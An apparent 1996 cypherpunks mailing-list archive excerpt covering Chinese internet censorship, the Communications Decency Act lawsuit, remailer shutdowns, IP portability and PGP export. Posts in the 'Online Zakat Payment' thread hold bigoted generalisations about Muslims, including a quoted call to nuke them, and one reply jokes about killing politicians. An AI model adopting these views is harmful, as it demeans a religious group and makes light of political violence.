Registering IP addresses of course won't block out thoughtcrime originating 
outside China, but unless everyone else adopts the packet signing scheme you 
outline the censors will still have to filter incoming material 
semi-manually. As far as I can tell their government is at least as 
interested in keeping things in as they are keeping out the Four Horsemen.

-Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: willer@carolian.com (Steve Willer)
Date: Fri, 16 Feb 1996 04:19:20 +0800
To: Steven L Baur <steve@miranova.com>
Subject: Re: I've just unsubscribed from cypherpunks
In-Reply-To: <9602141233.AA00418@sulphur.osf.org>
Message-ID: <31235055.260282871@saturn>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Feb 1996 19:56:38 -0800, you wrote:

>Rich $alz is the author of INN, and responsible (as the original
>moderator of comp.sources.unix) for the propagation of all the best
>tools we have available today.  Few people have contributed as much as
>he has to the spread of good free software.
>
>I think you probably owe him an apology.

I'm way ahead of you. I had misinterpreted his letter, thinking him to
be whining when he really wasn't. I've already apologized, and he's
already accepted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Fri, 16 Feb 1996 17:41:17 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: anonymous age credentials, sharing of
In-Reply-To: <199602151626.IAA20391@blob.best.net>
Message-ID: <Pine.A32.3.91.960215162350.17030k-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, gw wrote:

> the People, want to support permanently binding a traceable, non-anonymous
> identity to all certificate attributes that are used in electronic exchange
> (age, etc...) then there is going to be the potential for someone to
> deliberately allow their credential to be misused.
> 
> IMO, to prevent this totally would require implanting a non-forgable i.d.
> chip in everyone at birth ..... not very appealing.

And even then, what about the people that undergo surgery to swap chips?

The only REAL way of authentication is biometrics.  Anything else can be 
swapped.  But if you amputate someone's hand or retinas then they won't 
work(check for things like blood flow, etc.)

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 16 Feb 1996 10:23:02 +0800
To: cypherpunks@toad.com
Subject: Re: True democracy the electronic way
In-Reply-To: <199602151940.LAA04320@netcom18.netcom.com>
Message-ID: <199602152143.QAA27240@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> >You might try the "Cypherwonks" mailing list that L. Detweiler set up a
> >couple of years ago to explore the very ideas you are supporting here. You
> >might find you have a lot in common with him.
> 
> interesting you should mention that. because of my interests
> I've heard various legends that this list (long ago in a galaxy far away)
> was sabotaged by piles of trash sent
> through anonymous remailers,

For those not in the know, I will point out for the record that
Vladimir Z. Nuri is actually L. Detweiler and that you are watching a
form of strange masked dance in which everyone pretends that they
don't know who the other person is. We now return you to the surreal
dialog already in progress.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 16 Feb 1996 22:51:37 +0800
To: cypherpunks@toad.com, e$@thumper.vmeng.com
Subject: China -- the fragile glimmer of freedom
Message-ID: <199602160010.RAA03646@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I have seen two articles-- one each from two prominent
cypherpunks who shall remain unnamed-- which said something
to the effect that China's censorship of the Chinese part of
the Internet will only "hurt themselves".  The apparent
degree of unconcern, or at least the callous way that it was
presented, saddened me.


One of the messages even ended with a sardonic "Oh well.".


For people who spewed forth hundreds of articles of rants
when the toothless CDA outlawed lewdity and advice about 
abortion, and for people who bravely and promptly took
action to protect the free speech of a <contempt>Holocaust
denier</contempt>, the cpunks have been noticeably silent 
about this much more cruel and widespread repression.


Perhaps you think that the compliant Chinese person is
satisfied with his or her role as lackey of his government? 
Or is it that we and the Asians inhabit such different 
worlds that we will have to make do without each other's 
help?



I think the cpunks are better than that, and I think that as
information technology permeates China, that the cpunks will
also be there, creating tools, smuggling them to the
Chinese people, and teaching them how to use these tools to
assert sovereign control over their own words and thoughts.


And pausing, on occasion, to engage in the cyberspace
equivalent of displaying a certain Western obscene gesture
towards the totalitarian government.



ObCrypto:  The RSA signature on this message can be used by
the Chinese police if they would like to verify its
authorship.  I might come to regret this someday...

ObE$:  Probably the most powerful of said tools is currency.


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMSPLb/WZSllhfG25AQGKBwP7BFjWue3axSz2NH0vKjMhYI3EK5IQQb96
ApuLvyOyQgTHGNW0BWgESvT1Xm8zkWf7QoVM7qdnF5Q5FPi2TmaxNKx4TJi4+2cp
7lnxbOO/eXMIMutrKcBxMMJW8MiBi6le5FoJ98t/OeHLZQ32c7hljeE3YKSMSt5G
9kqKqfaPiu8=
=aZ3k
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 16 Feb 1996 17:39:54 +0800
To: cypherpunks@toad.com
Subject: Religious Right and CDA
Message-ID: <Pine.SUN.3.91.960215171827.16003B-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Please see http://www.cdt.org/policy/freespeech/cc_ltr.html for a letter 
from Ed Meese, Ralph Reed, Donald E. Wildmon, and others which actually 
suggests language in the CDA.

"Attached is the specific language we support which includes the House
passed language on obscenity and includes revisions on both the House
passed language on indecency, which would amend Title 18 and the
Senate-passed language on indecency, which would amend Title 47. The
combination of these provisions, we believe, would provide effective laws
to curb obscenity and indecency on the Internet by establishing that all
who knowingly participate in the distribution or facilitation of obscenity
to anyone or indecency to children would be subject to the law."

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 17 Feb 1996 21:41:04 +0800
To: t byfield <tbyfield@panix.com>
Subject: Re: Selling-Candy[TM] Politics
In-Reply-To: <v02120d02ad4974073c7f@DialupEudora>
Message-ID: <Pine.SUN.3.91.960215172247.10647A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 15 Feb 1996, t byfield wrote:

> . . . KILL THIS THREAD (assassination politics), NOT POLITICIANS.

Hey, they aren't mutually exclusive.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 16 Feb 1996 22:51:41 +0800
To: cypherpunks@toad.com
Subject: (fwd) ALERT! Govt thought police online, to be debated on PBS 2/15
Message-ID: <v02120d01ad496d0e3055@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
X-Priority: 1 (Highest)
Date: Thu, 15 Feb 1996 13:26:25 -0800
To: GovAccess@well.com
From: jwarren@well.com (Jim Warren)
Subject: ALERT! Govt thought police online, to be debated on PBS 2/15
Cc: fight-censorship+@andrew.cmu.edu
Sender: owner-govaccess@well.com
Precedence: bulk

Date: Thu, 15 Feb 1996 15:05:21 -0500
To: policy-posts@cdt_list.cdt.org
From: editor@cdt.org (CDT Editor)
Subject: TONIGHT (2/15) on PBS - CDT Dir. Jerry Berman vs. Family Research
Council
Resent-From: policy-posts@cdt_list.cdt.org
X-Mailing-List: <policy-posts@cdt_list.cdt.org> archive/latest/14
X-Loop: policy-posts@cdt_list.cdt.org
Precedence: list
Resent-Sender: policy-posts-request@cdt_list.cdt.org

Jerry Berman, Executive Director of the Center for Democracy and
Technology, will debate Cathleen Cleaver of the Family Research Council
TONIGHT (Thurs 2/15) on PBS's 'News Hour with Jim Lerher'. (Formerly the
MacNeill/Lerher News Hour).

Check your local listings for time and channel.

Cleaver and the Family Research Council were strong supporters of the Exon
"Communications Decency Act." Topics to be discussed include the CDA, court
challenges, the recent announcement by Compuserve to un-block Usenet access
and provide parental control technologies to CIS subscribers, and other
issues relating to Internet Censorship.

==

I just god it, so now you just got it (as quick as my listserv can shovel
it out the pipe).

--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>



Mo' as it Is.

--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>

To add or drop GovAccess, email to  Majordomo@well.com  ('Subject' ignored)
with message:  [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message:  info GovAccess

Past postings are at  ftp.cpsr.org: /cpsr/states/california/govaccess
and by WWW at  http://www.cpsr.org/cpsr/states/california/govaccess .
Also forwarded to USENET's  comp.org.cpsr.talk  by CPSR's Al Whaley.

May be copied & reposted except for any items that explicitly prohibit it.
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Fri, 16 Feb 1996 11:36:47 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
Message-ID: <v02140b00ad4978ac0d4a@[199.1.11.167]>
MIME-Version: 1.0
Content-Type: text/plain


>Alan Olsen wrote:
>
>| >     Addresses will not be easily 'transferable.'  The IETF is
>| >discussing a 'Best Current Practices' document that talks about
>| >address portability.  Basically, it can't happen, because the routers
>| >only have so much memory, and the routers at the core of the internet
>| >can't keep in memory how to reach every one; there needs to be
>| >aggregation.  The only feasible aggregation seems to be provider
>| >based, ie, MCI, Alternet, and other large ISPs get blocks of
>| >addresses.  They give them to smaller companies, like got.net, which
>| >gives them to customers.  The result?  The core routers have a few
>| >more years.
>|
>| A good point. Having parts of subnet shifting around could be pretty painful
>| from an admin point of view.
>
>Its not an admin's point of view thats worrisome.  Whats worrisome is
>that the routers at the core of the net only have so much memory, and
>if the routing tables grow beyond that, we're all hosed, becuase the
>core of the internet will start thrashing.  So, in essense, you taking
>your network address with you when you switch providers ('address
>portability' causes costs that must be borne by the entire global
>internet.

Given that the world of telephony is moving towards Local Number Portability,
isn't it inevitable that the internet will be expected to provide the
equivalent functionality?  In the world of telephones it's being mandated
in the name of local loop competition, which presumably isn't a problem
for the internet.  But if someday i can move across the country and
keep my telephone number, i'd expect the same of my internet address.

That said, the issue of who manages the database is a significant one, but
more political/economic issue than technical.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: deepthroat@alpha.c2.org (Deep Throat)
Date: Sun, 18 Feb 1996 01:51:40 +0800
To: cypherpunks@toad.com
Subject: China
Message-ID: <199602160237.SAA00778@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




Even if the Chinese make this work for a few years and the
US does the same, it doesn't matter in the long run.  People can run
short lived remailers out of accounts that don't belong to them.  They
can buy service over an encrypted link from a seller outside of China.
They can use steganography.

Given this, how can a Chinese or other represive government crack
down?  They can't turn off all the computers.  They can try to allow
access to only 'aproved' sites.  They can arrest people.  But will the
war on encryption be as easily won as the war on drugs?  Drugs are
physical things; they emit odors, require bulky transport, guards,
etc.  Binary code doesn't emit a smell.  You can't train a dog to find
PGP.  Yes they can crack down, but all that will do is make the
information economy move underground and offshore.

In time, those states that declare war on encryption will become
police states.  Police states can kill a lot of people, but they tend
not to last more than a few generations.


Jon Lasser wrote:

| Not if it's just a proof-of-concept for US implementation of the same.
| 
| The US version might be ostensibly only "anti-indecency" or 
| "anti-cryptography," but I'm betting that if the Chinese are successful, 
| many other nations follow.
| 
| It's the naval blockade to JPB's Independant Cyberspace.  And I think JPB 
| is... a little overoptimistic this time... but I still don't like the 
| blockade.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Fri, 16 Feb 1996 22:46:50 +0800
To: cypherpunks@toad.com
Subject: Selling-Candy[TM] Politics
Message-ID: <v02120d02ad4974073c7f@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 PM 2/15/96, Bill Frantz wrote:

>My purpose on this thread is to examine the limits of Jim Bell's idea of
>Assassination Politics.  My ground rules are to assume that it is a natural
>outgrowth of the technologies of anonymous cash and anonymous remailers.

        It's a natural outgrowth of Jim Bell's noggin, more like. It has
nothing per se to do with anonymous remailers _or_ anonymous cash _or_
double blinding _or_ anything else of much interest to anyone on this list
except for a few overheated zealots: you could describe any economic
activity you want--including selling candy to children or paying big
meanies to steal it from them--with precisely the same protocols. KILL THIS
THREAD, NOT POLITICIANS.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Fri, 16 Feb 1996 22:48:29 +0800
To: pdx-cypherpunks-l@teleport.com (PDX Cypherpunks)
Subject: HRoller Anonymous Remailer Shut Down
Message-ID: <199602160326.TAA09013@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text


This bit of unverified news from alt.privacy:

> From: hroller@infinity.c2.org (hroller)
> Date: 13 Feb 1996 16:47:06 GMT
>
> This is to announce that hroller remailer is shutting down for good. Due
> to the fact of the current issues and my ISP raising costs, I can no
> longer support this remailer. I guess you could say THEY Won! What I mean
> by this is not only Sen. Exxon, but the users also. The Abuse that goes
> through the remailers is something you would not believe. And until the
> people on the internet wake up and start acting like adults, this problem
> is not going to change.  
> 
> It's been fun, up until lately. 
> 
> hroller

Between irresponsible online behavior and media-spins, such as the example
posted by Mr. Young, will probably make '96 the year of the remailer wars.
If they're not out-and-out banned in the U.S. by '98 I'll be surprised (but
damned happy.)  Hats off to HRoller and Broiles who've fought the good fight.

Wink




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 16 Feb 1996 22:51:51 +0800
To: "Interested People" <interest@epic.org>
Subject: No Subject
Message-ID: <n1387709557.45828@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


A federal judge in Philadelphia has issued a partial temporary 
restraining order prohibiting enforcement of the "indecency" 
provision of the Communications Decency Act (CDA).  The judge 
declined to enjoin those provisions of the Act dealing with 
"patently offensive" communications.

The court agreed with the plaintiffs' claim that the CDA will have 
a chilling effect on free speech on the Internet and found that 
the CDA raises "serious, substantial, difficult and doubtful 
questions."  The court further agreed that the CDA is 
"unconstitutionally vague" as to the prosecution for indecency.  
But the court left open the possibility that the government could 
prosecute under the "patently offensive" provisions

The court has recognized the critical problem with the CDA, which 
is the attempt to apply the indecency standard to on-line 
communications.  Nonetheless, online speech remains at risk 
because of the sweeping nature of the CDA. 

The entry of the court order is a strong indication that the 
"indecency" provision of the legislation that went into effect on 
February 8 will not survive constitutional scrutiny by a three-
judge panel that has been impaneled in Philadelphia.  The panel 
will fully evaluate the constitutional validity of the legislation 
and consider entry of a permanent injunction against enforcement 
of the new law.

The temporary restraining order (TRO) was issued in a lawsuit 
filed by the Electronic Privacy Information Center (EPIC), the 
American Civil Liberties Union and a broad coalition of 
organizations.  EPIC is also participating as co-counsel in the 
litigation.  

The court ruling comes in the wake of widespread denunciation of 
the CDA, which was included in the telecommunications reform bill 
signed into law last week.

According to EPIC Legal Counsel David Sobel, one of the attorneys
representing the coalition, "The court's decision is a partial 
victory for free speech, but expression on the Internet remains at 
risk.  This is destined to become a landmark case that will 
determine the future of the Internet."  Looking ahead to 
proceedings before the three-judge panel, Sobel said "we are 
optimistic that further litigation of this case will demonstrate 
to the court that the CDA, in its entirety, does not pass 
constitutional muster."

EPIC has maintained since its introduction in Congress that the 
ban on "indecent" and "patently offensive" electronic speech is a 
clear violation of the free speech and privacy rights of millions 
of Internet users. 

Comprehensive information on the CDA lawsuit, including 
plaintiffs' brief in support of the TRO, is available at:

     http://www.epic.org/free_speech/censorship/lawsuit/


===============================================================
David L. Sobel
Legal Counsel
Electronic Privacy Information Center
sobel@epic.org
http://www.epic.org
===============================================================




_________________________________________________________________________
Subject:
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Fri, 16 Feb 1996 11:43:01 +0800
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <199602150328.AA08186@sunstorm.corp.cirrus.com>
Message-ID: <Pine.SUN.3.91.960215195329.5122A-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Ashfaq Rasheed wrote:

> > 
> > On Mon, 12 Feb 1996, Timothy C. May wrote:
> > 
> > > At 10:07 PM 2/12/96, Steven C. Perkins wrote:
> > > Once again, the gutter religion of Islam reveals the derangement of its
> 		^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > > so-called Prophet.
> > > 
> > > The world really needs to get around to nuking these folks.
> > > 
> > Oh, Come now!  Islam may in its present form be a religion deeply hostile 
> > to liberty.  But since "nuking" the whole Islamic world would not be 
> > itself much of a defence of freedom, the only long term answer is to 
> > promote within Islam the same kind of Reformation as eventually made 
> > Christianity half decent.  And Tim's comments do not contribute to that.  
> > I don't know how many internet servers there are in the Middle East.  
> > But, if I were an intelligent fundamentalist, I'd be copying it all over 
> > the place.  "Look", I'd be saying, "these people really do mean another 
> > crusade to destroy us and our faith".
> > 
> > I can understand Tim's disgust with these people.  But I do question his 
> > manner of expressing it.
> > 
> 
> Actions of certain individual or group does not reflect what the actual
> religion is. Examples of this can be found on every religion. 
> 
> Somebody generalizing as above reflects his/her own closed/blocked mentality.
> 
> Look at yourself, if you can fall to such degrading levels and since you 
> happen to be a member of this mailing list, it is not ration to think as
> every cpunks as demented as you are.
> 
> Ashfaq Ahmed
> 
True, there are risks in generalising from the actions of one individual 
to the group as a whole.  Nevertheless, where Islam is concerned, there 
are so many individuals behaving badly that we are justified in thinking 
the whole religion a force for bad.

Doubtless, I shall be told that "true Islam" is "true tolerance", "true 
freedom", and even "true apple pie".  I may be told that the horrors of 
actually existing Islam - remember this phrase, or something like it? - 
are all somehow the fault of the West.  But the fact is that most Moslems 
venerate old men in beards, who think that anyone who disagrees 
with them about God should be put to death, that a woman with a 
clitoris is a kind of devil, and that Western classical music is evil.

By my standards, these people are disgusting.  My only dispute with Tim 
is in our manner of expressing our disgust.

Sean Gabb
Editor
Free Life.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sentient1" <Shade@cdale1.midwest.net>
Date: Fri, 16 Feb 1996 13:07:31 +0800
To: cypherpunks@toad.com
Subject: PGP
Message-ID: <199602160232.UAA04240@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Esteemed GentlePersons,

      Could you settle a dispute?  Is it, or Is it not, legal to take 
PGP source code and the like out of the country if it is written on 
paper?

Thank You




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 17 Feb 1996 21:41:11 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SUN.3.91.960215195329.5122A-100000@scorpio.gold.ac.uk>
Message-ID: <Pine.SV4.3.91.960215205427.20308D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, Sean Gabb wrote:

> where Islam is concerned, there 
> are so many individuals behaving badly that we are justified in thinking 
> the whole religion a force for bad.

> But the fact is that most Moslems 
> venerate old men in beards, who think that anyone who disagrees 
> with them about God should be put to death, that a woman with a 
> clitoris is a kind of devil, and that Western classical music is evil.


    And your travels in the Islamic world consist of?   And you 
personally know how many Muslims?  And you have read how much Islamic 
sources?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Zychik <jzychik@via.net>
Date: Fri, 16 Feb 1996 15:36:55 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <2.2.32.19960216050049.007358fc@via.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:59 PM 2/15/96 -0500, you wrote:
>On Thu, 15 Feb 1996, Sean Gabb wrote:
>
>> where Islam is concerned, there 
>> are so many individuals behaving badly that we are justified in thinking 
>> the whole religion a force for bad.
>
>> But the fact is that most Moslems 
>> venerate old men in beards, who think that anyone who disagrees 
>> with them about God should be put to death, that a woman with a 
>> clitoris is a kind of devil, and that Western classical music is evil.
>
>
>    And your travels in the Islamic world consist of?   And you 
>personally know how many Muslims?  And you have read how much Islamic 
>sources?

Below is an article from today's Zychik Chronicle, that is very, very
relevant to this post:


(New York Times) "I didn't know enough Arabic to lead the prayer and was
still a student of the Koran," said Isak-El M. Pasha. A plumber at the time,
he was appointed the inman of the Malcolm Shabazz Mosque in Harlem. The
appointment was given to him by the dying inman, Ali Rashid.
He cried that night and "submitted to the 'will of Allah.'" The orthodox
Sunni Muslim sect he was to lead had broken with Louis Farakhaan in the
70's. By 1993, when Mr. Pasha took over, membership had dwindled down to
700. At one time this had been the temple where Malcolm X had preached his
most fiery sermons! But the break with Farakhaan almost caused the Mosque to
be foreclosed on.
Today the Mosque has 8,000 members and Mr. Pasha is "being called Harlem's
new spokesman." Mr. Pasha's rise in the Black community establishes that
most Blacks don't like racism. Here's a few quotes of his: "We have as much
racism practiced among us as black people as any racism that has been
practiced upon us by other groups." When he invited the white Mayor of New
York City to speak at the mosque he was criticized by radical black racists.
His response: "Sometimes leadership in Harlem treats African-Americans like
children. . Like if some white man talks to us we're going to be lead back
into slavery. We have a constituency and I'm obligated to bring those they
elect to them."
Finally, a comment that is sure to drive Bill-Racist-Clinton and
Janet-makes-you-feel-sorry-for-Parkinson's-disease-Reno up the wall: "Islam
won't accept racism and won't allow Muslims to practice it."
Let's call Mr. Pasha a True Muslim.

-----------------------
To subscribe to the Zychik Chronicle please reply by e-mail.


jz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 17 Feb 1996 11:16:21 +0800
To: Adam Shostack <ethridge@Onramp.NET (Allen B. Ethridge)
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
Message-ID: <199602160514.VAA22111@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:23 PM 2/15/96 -0500, Adam Shostack wrote:
>DNS names are not IP numbers.
>
>IP numbers are not portable, DNS names are.  You can move toad.com
>anywhere on the network, but you can't move 140.174.2.1 anywhere on
>the network.

FYI - IP portability, both in the sense of disconnecting in one place and
reconnecting in another and in the sense of keeping a TCP connection alive
while moving from place to place are design goals of IPv6


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Fri, 16 Feb 1996 12:50:07 +0800
To: cypherpunks@toad.com
Subject: (Fwd) UPDATE: DoJ Brief is Filed
Message-ID: <199602160222.VAA17815@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Just received this... (apologies to crypto-only folx on the list)

------- Forwarded Message Follows -------
Date:          Thu, 15 Feb 1996 14:26:38 -0800 (PST)
To:            protest@wired.com
From:          telstar@wired.com (--Todd Lappin-->)
Subject:       UPDATE: DoJ Brief is Filed


At long last, the U.S. Department of Justice has filed a brief in
Philadelpia, in an effort to persuade Judge Buckwalter NOT to issue a
Temporary Restraining Order (TRO) that would block implementation and
enforcement of the Communications Decency Act.

As you'll see below, the DoJ, much like Cathleen Cleaver, seems all too
eager to equate "indecency" with "pornography."

Grrrrrr.

Even worse, the DoJ brief apparently cites Marty Rimm's discredited study
about the "pervasiveness" of online pornography as evidence of the urgent
need to outlaw indecent material.

(TIME Magazine used Rimm's study as the basis for it's sensationalistic
"Cyberporn" cover story back in July.  It was later revealed that Rimm was
an undergradute at Carnegie Mellon University when he did the study, and
that his research contained so many methodological flaws that it was all
but worthless.  TIME even printed a retraction of the story.  For more
information, visit http://www.hotwired.com/special/pornscare/)

According to Ann Beeson, Staff Counsel for the ACLU, "We never thought DOJ
would be dumb enough to cite to the Rimm study, so it wasn't mentioned in
our initial brief!  We expect the judge to rule on the TRO without further
reply from us, so we'll have to wait until the next round (the preliminary
injunction hearing)
before getting in all the info debunking Rimm -- in any event, it is
certain to be *very* embarassing for the government."

Grrrrrrr.

No word yet on when we can expect a decision from Judge Buckwalter, but the
ACLU tells me they plan to issue a press release later today.  If so, I'll
immediately pass it along.

In the meantime, here's a CNN update on the DoJ action from
http://www.cnnfn.com/news/wires/9602/15/telecom.lawsuit/index.html

Stay tuned!

--Todd Lappin-->
Section Editor
WIRED Magazine

==================================================================

Justice Department responds to telecom lawsuit

February 15, 1996
Web posted at: 12:30 p.m. EST

PHILADELPHIA, Pennsylvania (AP) -- The Justice Department filed its
written response Wednesday to a lawsuit seeking to block the new
computer "indecency" law, saying criminal prosecutions are needed to
stop a huge increase in the availability of pornography.

The government urged a federal judge not to issue a temporary
restraining order against provisions that would make it a crime to send
"indecent" and sexually explicit material to minors over computer
networks.

"Individuals undoubtedly have an important interest in being free of
purposeful and direct intrusions on First Amendment freedoms," the brief
said. "But the governmental interests at stake here in controlling
access by minors in indecent sexually explicit materials is compelling."

The American Civil Liberties Union and 19 other groups sought the
temporary ban Feb. 8, the same day President Clinton signed into law the
Telecommunications Act of 1996.

U.S. District Judge Ronald L. Buckwalter said then that he wanted to see
a written response from prosecutors before issuing a ruling.

The law defines indecent as that which, "in context, depicts or
describes, in terms patently offensive as measured by contemporary
community standards, sexual or excretory activities or organs."

Opponents say the standard is too broad and would criminalize
information, even in private e-mail, that has educational, artistic and
social value, simply because it relates to sex.

The government said the indecency standard has been upheld as
constitutional in previous cases, and argued that the law's purpose is
to restrict access to widely available pornographic images and
materials.

Violators would face up to two years in prison and $250,000 in fines.

A temporary restraining order should only be granted in extraordinary
circumstances and if there are no other legal remedies available to
plaintiffs. Meanwhile, the situation is dire, the government said.

"In the end, plaintiffs cannot dispute that a large and growing amount
of pornography is presently available on-line and easily accessible to
children in the home, far exceeding anything available prior to the
advent of on-line computer services," the government said.

###



Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 16 Feb 1996 12:49:56 +0800
To: ethridge@Onramp.NET (Allen B. Ethridge)
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
In-Reply-To: <v02140b00ad4978ac0d4a@[199.1.11.167]>
Message-ID: <199602160223.VAA00381@homeport.org>
MIME-Version: 1.0
Content-Type: text


DNS names are not IP numbers.

IP numbers are not portable, DNS names are.  You can move toad.com
anywhere on the network, but you can't move 140.174.2.1 anywhere on
the network.

Allen B. Ethridge wrote:

| >Its not an admin's point of view thats worrisome.  Whats worrisome is
| >that the routers at the core of the net only have so much memory, and
| >if the routing tables grow beyond that, we're all hosed, becuase the
| >core of the internet will start thrashing.  So, in essense, you taking
| >your network address with you when you switch providers ('address
| >portability' causes costs that must be borne by the entire global
| >internet.
| 
| Given that the world of telephony is moving towards Local Number Portability,
| isn't it inevitable that the internet will be expected to provide the
| equivalent functionality?  In the world of telephones it's being mandated
| in the name of local loop competition, which presumably isn't a problem
| for the internet.  But if someday i can move across the country and
| keep my telephone number, i'd expect the same of my internet address.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdoe-agamemnon@alpha.c2.org
Date: Sat, 17 Feb 1996 11:15:47 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Decency Act
Message-ID: <199602160543.VAA05938@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
>Perry sent me a polite note asking why I had posted the original post, and
>He suggested that in the future I make it clear why I think my posts are
>relevent to the subject of the list.

Is this what we call the chilling effect?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sat, 17 Feb 1996 11:25:29 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199602160551.VAA16645@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



